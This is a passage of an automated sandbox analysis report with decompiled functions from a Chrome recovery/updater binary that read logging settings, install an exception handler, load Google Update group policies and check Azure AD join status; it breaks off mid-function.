Instruction ID: b58af9c29aa7f3223b7a330b0d78900d999061b7e6c978c1088a4b0b9d764199
Opcode Fuzzy Hash: bda738d08d25ebf255c20e25147d100da1a799ef9bf7d19cfe924acfd95ae72a
Instruction Fuzzy Hash: 41519F32600611EFDB19EF28DC86B99BBA4FF09324F148269F428971A1DB70BD50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C73298 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C73298(signed int __ecx) {
				WCHAR* _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				signed int _v20;
				WCHAR* _v24;
				void* __edi;
				char _t48;
				signed int _t51;
				WCHAR* _t52;
				intOrPtr _t53;
				int _t58;
				signed int _t67;
				WCHAR* _t71;
				signed int _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;
				WCHAR* _t80;

				_t67 = __ecx; // executed
				_t48 = E00C72EB2(); // executed
				 *((char*)(__ecx + 0x77)) = _t48;
				E00C73E17(__ecx, _t76,  &_v8);
				_t77 = _v8;
				_t79 = GetPrivateProfileIntW;
				_v24 = _t77;
				if( *((intOrPtr*)(_t77 - 0xc)) == 0) {
					 *((char*)(_t67 + 0x74)) = 1;
					_t51 = 1;
					 *((char*)(_t67 + 0x76)) = 1;
					 *((char*)(_t67 + 0x78)) = 0;
				} else {
					 *((char*)(_t67 + 0x74)) = GetPrivateProfileIntW(L"LoggingSettings", L"EnableLogging", 1, _t77) & 0xffffff00 | _t60 != 0x00000000;
					 *((char*)(_t67 + 0x76)) = GetPrivateProfileIntW(L"LoggingSettings", L"ShowTime", 1, _t77) & 0xffffff00 | _t62 != 0x00000000;
					 *((char*)(_t67 + 0x78)) = GetPrivateProfileIntW(L"LoggingSettings", L"LogToOutputDebug", 0, _t77) & 0xffffff00 | _t64 != 0x00000000;
					_t51 = GetPrivateProfileIntW(L"LoggingSettings", L"AppendToFile", 1, _t77) & 0xffffff00 | _t66 != 0x00000000;
				}
				 *(_t67 + 0x79) = _t51;
				if( *((char*)(_t67 + 0x75)) != 0) {
					 *((char*)(_t67 + 0x76)) = 1;
				}
				_t52 = 0;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = 7;
				_t78 = _t79;
				_v8 = 0;
				do {
					_t25 =  &(_t52[0x654558]); // 0xca36b4
					_t70 =  *_t25;
					_v16 = _t70;
					if(_t70 != 0) {
						_t27 =  &(_t52[0x65455a]); // 0x1
						_t70 =  *_t27;
						_v20 = _t70;
						if(_t70 <= 9) {
							_t73 = _t67;
							E00C73E17(_t73, _t78,  &_v12);
							_t80 = _v12;
							if( *((intOrPtr*)(_t80 - 0xc)) == 0) {
								_t58 = 1;
							} else {
								_t58 = GetPrivateProfileIntW(L"LoggingLevel", _v16, 1, _t80);
							}
							_t75 = _v20;
							 *((char*)(_t67 + _t75 * 8)) = _t73 & 0xffffff00 | _t58 != 0x00000000;
							_t38 = _t80 - 0x10; // -16
							_t70 = _t38;
							 *(_t67 + 4 + _t75 * 8) = _t58;
							E00C713C0(_t58, _t38);
							_t52 = _v8;
						}
					}
					_t52 =  &(_t52[4]);
					_v8 = _t52;
				} while (_t52 < 0x48);
				_t53 = E00C77495(_t70);
				_t71 = _v24;
				 *((intOrPtr*)(_t67 + 0x80)) = _t53;
				 *(_t67 + 0x84) = _t75;
				_t47 = _t71 - 0x10; // 0x7e845
				return E00C713C0(_t53, _t47);
			}

0x00c732a1
0x00c732a3
0x00c732a8
0x00c732b1
0x00c732b6
0x00c732b9
0x00c732bf
0x00c732c6
0x00c73323
0x00c73327
0x00c73329
0x00c7332d
0x00c732c8
0x00c732e9
0x00c73300
0x00c73317
0x00c7331e
0x00c7331e
0x00c73331
0x00c73338
0x00c7333a
0x00c7333a
0x00c7333e
0x00c73340
0x00c73343
0x00c7334a
0x00c7334c
0x00c7334f
0x00c7334f
0x00c7334f
0x00c73355
0x00c7335a
0x00c7335c
0x00c7335c
0x00c73362
0x00c73368
0x00c7336d
0x00c73370
0x00c73375
0x00c7337c
0x00c7338f
0x00c7337e
0x00c73389
0x00c73389
0x00c73390
0x00c73398
0x00c7339b
0x00c7339b
0x00c7339e
0x00c733a2
0x00c733a7
0x00c733a7
0x00c73368
0x00c733aa
0x00c733ad
0x00c733b0
0x00c733b5
0x00c733ba
0x00c733bd
0x00c733c3
0x00c733c9
0x00c733d5

APIs

Part of subcall function 00C72EB2: RegOpenKeyExW.KERNELBASE ref: 00C72ED2

GetPrivateProfileIntW.KERNEL32(LoggingSettings,EnableLogging,00000001,00000000), ref: 00C732D5
GetPrivateProfileIntW.KERNEL32(LoggingSettings,ShowTime,00000001,00000000), ref: 00C732EC
GetPrivateProfileIntW.KERNEL32(LoggingSettings,LogToOutputDebug,00000000,00000000), ref: 00C73303
GetPrivateProfileIntW.KERNEL32(LoggingSettings,AppendToFile,00000001,00000000), ref: 00C7331A
GetPrivateProfileIntW.KERNEL32(LoggingLevel,00000001,00000001,00000000), ref: 00C73389

Strings

ShowTime, xrefs: 00C732DC
EnableLogging, xrefs: 00C732CB
AppendToFile, xrefs: 00C7330A
LoggingSettings, xrefs: 00C732D0, 00C732E4, 00C732FB, 00C73312
LoggingLevel, xrefs: 00C73384
LogToOutputDebug, xrefs: 00C732F3

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: PrivateProfile$Open
String ID: AppendToFile$EnableLogging$LogToOutputDebug$LoggingLevel$LoggingSettings$ShowTime
API String ID: 2464959735-501848500
Opcode ID: 4f5afc2cb1a990abc2ba544020534342c3c5c9a4258a96f2456d2df8d724699d
Instruction ID: dc54a8318d73476c98d1e1bec7cba2230d041f975a86327633dc71d33079ba87
Opcode Fuzzy Hash: 4f5afc2cb1a990abc2ba544020534342c3c5c9a4258a96f2456d2df8d724699d
Instruction Fuzzy Hash: 0141B635A012C5ABDB10DF758845BAD7FE4AF42708F0480AAFC149F2D3D6B89A45E760

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FE00 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7FE00() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00C7FE0C); // executed
				return _t1;
			}

0x00c7fe05
0x00c7fe0b

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00C7FE05

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a2fb83f4a8cda66af8fc2a7d3f0a1f8bee997629d1e2a443120d8a63862e2185
Instruction ID: 5cb0a96d98895d4fc7f644670a9bed065ce4ac68e9d2bc8f8532f023cb79d8a9
Opcode Fuzzy Hash: a2fb83f4a8cda66af8fc2a7d3f0a1f8bee997629d1e2a443120d8a63862e2185
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BC0B Relevance: 54.7, APIs: 7, Strings: 24, Instructions: 403
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00C7BC0B(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				signed int* _v16;
				int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char _v64;
				signed int _v68;
				WCHAR* _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				signed int _v120;
				intOrPtr _v124;
				int _v128;
				char _v140;
				signed int _v144;
				signed int _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				int _v223;
				char _v224;
				void* __ebp;
				signed int _t143;
				void* _t148;
				char _t149;
				int _t150;
				signed int _t152;
				int _t164;
				int _t166;
				int _t167;
				int _t183;
				int _t188;
				int _t192;
				int _t194;
				intOrPtr _t195;
				int _t204;
				int _t205;
				intOrPtr _t206;
				signed int* _t207;
				intOrPtr _t211;
				intOrPtr _t218;
				int _t222;
				int _t224;
				int _t233;
				void* _t259;
				void* _t261;
				int _t271;
				signed int* _t273;
				signed int _t278;
				signed int _t284;
				signed int _t287;
				void* _t304;
				signed int _t305;
				intOrPtr _t307;
				WCHAR* _t308;
				signed int _t311;
				void* _t312;
				void* _t313;
				void* _t314;
				void* _t315;

				_t290 = __edx;
				_t143 =  *0xca8008; // 0x617e0cdd
				_v12 = _t143 ^ _t311;
				_t304 = __ecx;
				E00C7B108( &_v224);
				_t310 =  &_v224;
				_v68 = _v68 & 0x00000000;
				_v80 =  *((intOrPtr*)(__ecx + 0x10));
				_v16 =  &_v68;
				_t148 = E00C766D8(__ebx,  &_v224, __edx, __ecx,  &_v224); // executed
				_t318 = _t148;
				if(_t148 == 0) {
					asm("sbb ecx, ecx");
					_t222 = 1;
					_t233 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
					__eflags = _t233;
					if(__eflags != 0) {
						_v28 = _t233;
						_v24 = 7;
						_v20 = _t222;
						_t218 = E00C73993(_t233, __edx, _t233, _t222); // executed
						_v16 = _t218;
						_push(L"[ConfigManager::LoadGroupPolicies][Machine is not Enterprise Managed]");
						_push( &_v28);
						E00C715DB();
					}
				} else {
					_t222 = 1;
					_v224 = 1;
				}
				_t149 = E00C786B2(L"HKLM\\Software\\Policies\\Google\\Update\\", _t290, _t318); // executed
				if(_t149 != 0) {
					_v56 = _v56 & 0x00000000;
					_v60 = 0xca41c0;
					_v52 = 0x200;
					_t150 = E00C780D1( &_v60, _t290, __eflags, L"HKLM\\Software\\Policies\\Google\\Update\\", 0x20019); // executed
					__eflags = _t150;
					if(__eflags >= 0) {
						_v32 = _v32 & 0x00000000;
						_v223 = _t222;
						_t223 = L"HKLM\\Software\\Policies\\Google\\Update\\";
						_t152 = E00C78249(L"HKLM\\Software\\Policies\\Google\\Update\\", L"CloudPolicyOverridesPlatformPolicy", __eflags, 4,  &_v32, 0); // executed
						_t313 = _t312 + 0xc;
						__eflags = _t152;
						if(__eflags >= 0) {
							__eflags = _v32;
							_t34 = _v32 != 0;
							__eflags = _t34;
							 *((char*)(_t304 + 0x20)) = _t152 & 0xffffff00 | _t34;
						}
						E00C7C521(L"AutoUpdateCheckPeriodMinutes",  &_v216, __eflags); // executed
						E00C7B289(L"DownloadPreference",  &_v208, __eflags); // executed
						E00C7C521(L"PackageCacheSizeLimit",  &_v200, __eflags); // executed
						E00C7C521(L"PackageCacheLifeLimit",  &_v192, __eflags); // executed
						E00C7C521(L"UpdatesSuppressedStartHour",  &_v184, __eflags); // executed
						E00C7C521(L"UpdatesSuppressedStartMin",  &_v176, __eflags); // executed
						E00C7C521(L"UpdatesSuppressedDurationMin",  &_v168, __eflags); // executed
						E00C7B289(L"ProxyMode",  &_v160, __eflags); // executed
						E00C7B289(L"ProxyServer",  &_v156, __eflags); // executed
						E00C7B289(L"ProxyPacUrl",  &_v152, __eflags); // executed
						_v32 = _v32 & 0x00000000;
						_t164 = E00C78249(_t223, L"InstallDefault", __eflags, 4,  &_v32, 0); // executed
						_t314 = _t313 + 0xc;
						__eflags = _t164;
						if(__eflags >= 0) {
							_v148 = _v32;
						}
						_v32 = _v32 & 0x00000000;
						_t290 = L"UpdateDefault";
						_t166 = E00C78249(_t223, L"UpdateDefault", __eflags, 4,  &_v32, 0); // executed
						_t315 = _t314 + 0xc;
						__eflags = _t166;
						if(_t166 >= 0) {
							_v144 = _v32;
						}
						_t167 = E00C78BC5( &_v60);
						_t305 = 0;
						_v76 = _t167;
						_v32 = 0;
						__eflags = _t167;
						if(_t167 <= 0) {
							L52:
							_t222 = 0;
							__eflags = 0;
							L53:
							_v60 = 0xca41c0;
							E00C77F74( &_v60);
							L54:
							E00C7B7B4(_t222, _v80, _t290, _t310);
							E00C7B19C(_t222,  &_v224, _t290);
							return E00C7F35B(_v12 ^ _t311);
						} else {
							do {
								E00C71AD8( &_v36, _t290, E00C713D8());
								_v48 = _v48 & 0x00000000;
								_t177 = E00C78BEA( &_v60, _t305, _t310, _t305,  &_v36,  &_v48); // executed
								__eflags = _t177;
								if(_t177 >= 0) {
									_t224 = E00C7689F( &_v36, 0x7b, 0);
									__eflags = _t224;
									if(_t224 <= 0) {
										goto L19;
									}
									_t310 = _v36;
									_push( *((intOrPtr*)(_t310 - 0xc)) - _t224);
									_push(_t224);
									E00C76931(_t224,  &_v36, _t305, _t310,  &_v64);
									_t183 = 0;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t307 = _v64;
									__eflags =  *((intOrPtr*)(_t307 - 0xc)) - 0x26;
									if( *((intOrPtr*)(_t307 - 0xc)) != 0x26) {
										L48:
										_t261 = _t307 - 0x10;
										L49:
										_t177 = E00C713C0(_t183, _t261);
										_t305 = _v32;
										_t259 = _t310 - 0x10;
										goto L50;
									}
									_t183 =  &_v28;
									__imp__IIDFromString(_t307, _t183);
									__eflags = _t183;
									if(_t183 < 0) {
										goto L48;
									}
									_t183 = E00C93EC9(0xc9bd58,  &_v28, 0x10);
									_t315 = _t315 + 0xc;
									__eflags = _t183;
									if(_t183 == 0) {
										goto L48;
									}
									E00C7680B(_t224,  &_v36, _t290,  &_v72, _t224);
									_t308 = _v72;
									_t188 = _v48 - 1;
									__eflags = _t188;
									if(_t188 == 0) {
										E00C71AD8( &_v44, _t290, E00C713D8());
										_t192 = E00C784EE( &_v60, _t290, _t310,  &_v44);
										__eflags = _t192;
										if(_t192 < 0) {
											L46:
											_t193 = E00C713C0(_t192, _v44 - 0x10);
											L47:
											_t183 = E00C713C0(_t193, _t308 - 0x10);
											_t261 = _v64 - 0x10;
											goto L49;
										}
										_t194 = lstrcmpiW(_t308, L"TargetChannel");
										__eflags = _t194;
										if(_t194 != 0) {
											_t192 = lstrcmpiW(_t308, L"TargetVersionPrefix");
											__eflags = _t192;
											if(_t192 != 0) {
												asm("sbb ecx, ecx");
												_t271 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
												__eflags = _t271;
												if(_t271 != 0) {
													_t120 =  &_v120;
													 *_t120 = _v120 | 0xffffffff;
													__eflags =  *_t120;
													_v128 = _t271;
													_v124 = 7;
													_t195 = E00C73993(_t271, _t290, _t271, 0xffffffff);
													_push(_v44);
													_v116 = _t195;
													_t192 = E00C715DB( &_v128, L"[ConfigManager::LoadGroupPolicies][Unexpected String policy prefix encountered][%s][%s]", _t310);
													_t315 = _t315 + 0x10;
												}
												goto L46;
											}
											_push( &_v44);
											_t119 =  &((E00C7C3B5( &_v140, _t290,  &_v28))[3]); // 0xc
											_t273 = _t119;
											L43:
											_t192 = E00C74860(_t273, _t310);
											goto L46;
										}
										_push( &_v44);
										_t115 =  &((E00C7C3B5( &_v140, _t290,  &_v28))[2]); // 0x8
										_t273 = _t115;
										goto L43;
									}
									_t193 = _t188 == 3;
									__eflags = _t188 == 3;
									if(_t188 == 3) {
										_v40 = _v40 & 0x00000000;
										_t193 = E00C78413( &_v60, _t310,  &_v40);
										__eflags = _t193;
										if(_t193 < 0) {
											goto L47;
										}
										_t204 = lstrcmpiW(_t308, L"Install");
										__eflags = _t204;
										if(_t204 != 0) {
											_t205 = lstrcmpiW(_t308, L"Update");
											__eflags = _t205;
											if(_t205 != 0) {
												_t193 = lstrcmpiW(_t308, L"RollbackToTargetVersion");
												__eflags = _t193;
												if(_t193 != 0) {
													asm("sbb ecx, ecx");
													_t278 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
													__eflags = _t278;
													if(_t278 == 0) {
														goto L47;
													}
													_t102 =  &_v104;
													 *_t102 = _v104 | 0xffffffff;
													__eflags =  *_t102;
													_v112 = _t278;
													_v108 = 7;
													_t206 = E00C73993(_t278, _t290, _t278, 0xffffffff);
													_push(_v40);
													_v100 = _t206;
													_t207 =  &_v112;
													_push(_t310);
													_push(L"[ConfigManager::LoadGroupPolicies][Unexpected DWORD policy prefix encountered][%s][%d]");
													L37:
													_push(_t207);
													_t193 = E00C715DB();
													_t315 = _t315 + 0x10;
													goto L47;
												}
												(E00C7C3B5( &_v140, _t290,  &_v28))[4] = _v40;
												goto L47;
											}
											(E00C7C3B5( &_v140, _t290,  &_v28))[1] = _v40;
											goto L47;
										}
										 *(E00C7C3B5( &_v140, _t290,  &_v28)) = _v40;
										goto L47;
									}
									asm("sbb ecx, ecx");
									_t284 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L47;
									}
									_v88 = _v88 | 0xffffffff;
									_v96 = _t284;
									_v92 = 7;
									_t211 = E00C73993(_t284, _t290, _t284, 0xffffffff);
									_push(_v48);
									_v84 = _t211;
									_t207 =  &_v96;
									_push(_t310);
									_push(L"[ConfigManager::LoadGroupPolicies][Unexpected Type for policy prefix encountered][%s][%d]");
									goto L37;
								}
								L19:
								_t259 = _v36 + 0xfffffff0;
								L50:
								E00C713C0(_t177, _t259);
								_t305 = _t305 + 1;
								_v32 = _t305;
								__eflags = _t305 - _v76;
							} while (_t305 < _v76);
							_t310 =  &_v224;
							goto L52;
						}
					}
					__eflags = _v224;
					if(_v224 != 0) {
						asm("int3");
					}
					_t222 = _t150;
					goto L53;
				}
				_v224 = _t149;
				asm("sbb ecx, ecx");
				_t287 =  ~( *0xca9f1d & 0x000000ff) & 0x00ca9e40;
				if(_t287 != 0) {
					_v28 = _t287;
					_v24 = 7;
					_v20 = _t222;
					_v16 = E00C73993(_t287, _t290, _t287, _t222);
					E00C715DB( &_v28, L"[ConfigManager::LoadGroupPolicies][No Group Policies found under key][%s]", L"HKLM\\Software\\Policies\\Google\\Update\\");
				}
				goto L54;
			}

0x00c7bc0b
0x00c7bc14
0x00c7bc1b
0x00c7bc21
0x00c7bc29
0x00c7bc31
0x00c7bc37
0x00c7bc3b
0x00c7bc41
0x00c7bc44
0x00c7bc49
0x00c7bc4b
0x00c7bc63
0x00c7bc65
0x00c7bc66
0x00c7bc66
0x00c7bc6c
0x00c7bc70
0x00c7bc73
0x00c7bc7a
0x00c7bc7d
0x00c7bc82
0x00c7bc88
0x00c7bc8d
0x00c7bc8e
0x00c7bc94
0x00c7bc4d
0x00c7bc4f
0x00c7bc50
0x00c7bc50
0x00c7bc9a
0x00c7bca1
0x00c7bcf2
0x00c7bd03
0x00c7bd0a
0x00c7bd11
0x00c7bd16
0x00c7bd18
0x00c7bd2b
0x00c7bd34
0x00c7bd40
0x00c7bd49
0x00c7bd4e
0x00c7bd51
0x00c7bd53
0x00c7bd55
0x00c7bd59
0x00c7bd59
0x00c7bd5c
0x00c7bd5c
0x00c7bd6a
0x00c7bd7a
0x00c7bd8a
0x00c7bd9a
0x00c7bdaa
0x00c7bdba
0x00c7bdca
0x00c7bdda
0x00c7bdea
0x00c7bdfa
0x00c7bdff
0x00c7be12
0x00c7be17
0x00c7be1a
0x00c7be1c
0x00c7be21
0x00c7be21
0x00c7be27
0x00c7be33
0x00c7be3a
0x00c7be3f
0x00c7be42
0x00c7be44
0x00c7be49
0x00c7be49
0x00c7be52
0x00c7be57
0x00c7be59
0x00c7be5c
0x00c7be5f
0x00c7be61
0x00c7c141
0x00c7c141
0x00c7c141
0x00c7c143
0x00c7c146
0x00c7c14d
0x00c7c152
0x00c7c156
0x00c7c161
0x00c7c176
0x00c7be67
0x00c7be67
0x00c7be70
0x00c7be75
0x00c7be85
0x00c7be8a
0x00c7be8c
0x00c7bea5
0x00c7bea7
0x00c7bea9
0x00000000
0x00000000
0x00c7beab
0x00c7beb6
0x00c7beb7
0x00c7bebc
0x00c7bec1
0x00c7bec6
0x00c7bec7
0x00c7bec8
0x00c7bec9
0x00c7beca
0x00c7becd
0x00c7bed1
0x00c7c11b
0x00c7c11b
0x00c7c11e
0x00c7c11e
0x00c7c123
0x00c7c126
0x00000000
0x00c7c126
0x00c7bed7
0x00c7bedc
0x00c7bee2
0x00c7bee4
0x00000000
0x00000000
0x00c7bef5
0x00c7befa
0x00c7befd
0x00c7beff
0x00000000
0x00000000
0x00c7bf0d
0x00c7bf15
0x00c7bf18
0x00c7bf18
0x00c7bf1b
0x00c7c050
0x00c7c05d
0x00c7c062
0x00c7c064
0x00c7c100
0x00c7c106
0x00c7c10b
0x00c7c10e
0x00c7c116
0x00000000
0x00c7c116
0x00c7c070
0x00c7c076
0x00c7c078
0x00c7c098
0x00c7c09e
0x00c7c0a0
0x00c7c0c8
0x00c7c0ca
0x00c7c0ca
0x00c7c0d0
0x00c7c0d2
0x00c7c0d2
0x00c7c0d2
0x00c7c0d9
0x00c7c0dc
0x00c7c0e3
0x00c7c0e8
0x00c7c0eb
0x00c7c0f8
0x00c7c0fd
0x00c7c0fd
0x00000000
0x00c7c0d0
0x00c7c0a5
0x00c7c0b5
0x00c7c0b5
0x00c7c0b8
0x00c7c0b8
0x00000000
0x00c7c0b8
0x00c7c07d
0x00c7c08d
0x00c7c08d
0x00000000
0x00c7c08d
0x00c7bf21
0x00c7bf21
0x00c7bf24
0x00c7bf67
0x00c7bf73
0x00c7bf78
0x00c7bf7a
0x00000000
0x00000000
0x00c7bf86
0x00c7bf8c
0x00c7bf8e
0x00c7bfaf
0x00c7bfb5
0x00c7bfb7
0x00c7bfd9
0x00c7bfdf
0x00c7bfe1
0x00c7c006
0x00c7c008
0x00c7c008
0x00c7c00e
0x00000000
0x00000000
0x00c7c014
0x00c7c014
0x00c7c014
0x00c7c01b
0x00c7c01e
0x00c7c025
0x00c7c02a
0x00c7c02d
0x00c7c030
0x00c7c033
0x00c7c034
0x00c7c039
0x00c7c039
0x00c7c03a
0x00c7c03f
0x00000000
0x00c7c03f
0x00c7bff5
0x00000000
0x00c7bff5
0x00c7bfcb
0x00000000
0x00c7bfcb
0x00c7bfa2
0x00000000
0x00c7bfa2
0x00c7bf2f
0x00c7bf31
0x00c7bf31
0x00c7bf37
0x00000000
0x00000000
0x00c7bf3d
0x00c7bf44
0x00c7bf47
0x00c7bf4e
0x00c7bf53
0x00c7bf56
0x00c7bf59
0x00c7bf5c
0x00c7bf5d
0x00000000
0x00c7bf5d
0x00c7be8e
0x00c7be91
0x00c7c129
0x00c7c129
0x00c7c12e
0x00c7c12f
0x00c7c132
0x00c7c132
0x00c7c13b
0x00000000
0x00c7c13b
0x00c7be61
0x00c7bd1a
0x00c7bd21
0x00c7bd23
0x00c7bd23
0x00c7bd24
0x00000000
0x00c7bd24
0x00c7bcac
0x00c7bcb2
0x00c7bcb4
0x00c7bcba
0x00c7bcc2
0x00c7bcc5
0x00c7bccc
0x00c7bcd9
0x00c7bce5
0x00c7bcea
0x00000000

APIs

IIDFromString.OLE32(?,?,?,00000000,?,0000007B,00000000,00000000,?,00000000,00000000), ref: 00C7BEDC
_memcmp.LIBVCRUNTIME ref: 00C7BEF5

Part of subcall function 00C78413: SHQueryValueExW.SHLWAPI(00C77F74,00000000,00000000,00000000,?,00000000,00CA41C0,00CA41C0,?,00C78347,IsEnrolledToDomain,?,00000000,00000000,?,HKLM\Software\Google\UpdateDev\), ref: 00C78436

lstrcmpiW.KERNEL32(?,Install), ref: 00C7BF86
lstrcmpiW.KERNEL32(?,Update), ref: 00C7BFAF

Part of subcall function 00C7C3B5: _memcmp.LIBVCRUNTIME ref: 00C7C3D9

Strings

HKLM\Software\Policies\Google\Update\, xrefs: 00C7BC95, 00C7BCD4, 00C7BCFE, 00C7BD40
CloudPolicyOverridesPlatformPolicy, xrefs: 00C7BD3A
Update, xrefs: 00C7BFA9
Install, xrefs: 00C7BF80
AutoUpdateCheckPeriodMinutes, xrefs: 00C7BD65
UpdatesSuppressedDurationMin, xrefs: 00C7BDC5
UpdatesSuppressedStartHour, xrefs: 00C7BDA5
UpdatesSuppressedStartMin, xrefs: 00C7BDB5
[ConfigManager::LoadGroupPolicies][Unexpected Type for policy prefix encountered][%s][%d], xrefs: 00C7BF5D
PackageCacheLifeLimit, xrefs: 00C7BD95
[ConfigManager::LoadGroupPolicies][Unexpected String policy prefix encountered][%s][%s], xrefs: 00C7C0F2
TargetChannel, xrefs: 00C7C06A
[ConfigManager::LoadGroupPolicies][Machine is not Enterprise Managed], xrefs: 00C7BC88
RollbackToTargetVersion, xrefs: 00C7BFD3
InstallDefault, xrefs: 00C7BE0B
DownloadPreference, xrefs: 00C7BD75
[ConfigManager::LoadGroupPolicies][Unexpected DWORD policy prefix encountered][%s][%d], xrefs: 00C7C034
ProxyPacUrl, xrefs: 00C7BDF5
ProxyServer, xrefs: 00C7BDE5
[ConfigManager::LoadGroupPolicies][No Group Policies found under key][%s], xrefs: 00C7BCDF
ProxyMode, xrefs: 00C7BDD5
UpdateDefault, xrefs: 00C7BE33
PackageCacheSizeLimit, xrefs: 00C7BD85
TargetVersionPrefix, xrefs: 00C7C092

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: _memcmplstrcmpi$FromQueryStringValue
String ID: AutoUpdateCheckPeriodMinutes$CloudPolicyOverridesPlatformPolicy$DownloadPreference$HKLM\Software\Policies\Google\Update\$Install$InstallDefault$PackageCacheLifeLimit$PackageCacheSizeLimit$ProxyMode$ProxyPacUrl$ProxyServer$RollbackToTargetVersion$TargetChannel$TargetVersionPrefix$Update$UpdateDefault$UpdatesSuppressedDurationMin$UpdatesSuppressedStartHour$UpdatesSuppressedStartMin$[ConfigManager::LoadGroupPolicies][Machine is not Enterprise Managed]$[ConfigManager::LoadGroupPolicies][No Group Policies found under key][%s]$[ConfigManager::LoadGroupPolicies][Unexpected DWORD policy prefix encountered][%s][%d]$[ConfigManager::LoadGroupPolicies][Unexpected String policy prefix encountered][%s][%s]$[ConfigManager::LoadGroupPolicies][Unexpected Type for policy prefix encountered][%s][%d]
API String ID: 665591740-2910296779
Opcode ID: 68144932266f4733ce9041ff72ab331604fa3c5e789bc943471f53a42cacda30
Instruction ID: 7b65a85e8752a0ba682eae6ca490b692639f1388bc280f1a19ee68758a5b5824
Opcode Fuzzy Hash: 68144932266f4733ce9041ff72ab331604fa3c5e789bc943471f53a42cacda30
Instruction Fuzzy Hash: 2BE1A2B1D0020A9BDB14DFA4CC96BEEBBB8AF45304F10C16DE61AB7192DB745A44DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C76621 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00C76621(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _t7;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t27;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t38;

				_push(__ecx);
				_push(__ecx);
				_t39 =  *0xca8af8 - 0xffffffff;
				if( *0xca8af8 != 0xffffffff) {
					L15:
					_t7 =  *0xca8af8; // 0x0
					asm("sbb al, al");
					return  ~(_t7 - 1) + 1;
				}
				_v8 = 0;
				_t36 = E00C76765(L"NetApi32.dll", __edx, _t39);
				if(_t36 != 0) {
					_t12 = GetProcAddress(_t36, "NetGetAadJoinInformation"); // executed
					__eflags = _t12;
					if(_t12 == 0) {
						FreeLibrary(_t36);
						_t27 = 0x80004005;
					} else {
						_t18 =  *_t12(0,  &_v8); // executed
						_v12 = _t18;
						_t11 = FreeLibrary(_t36);
						_t27 = _v12;
					}
					__eflags = _t27;
					if(__eflags >= 0) {
						__eflags = _v8;
						if(__eflags != 0) {
							__eflags = 1;
						}
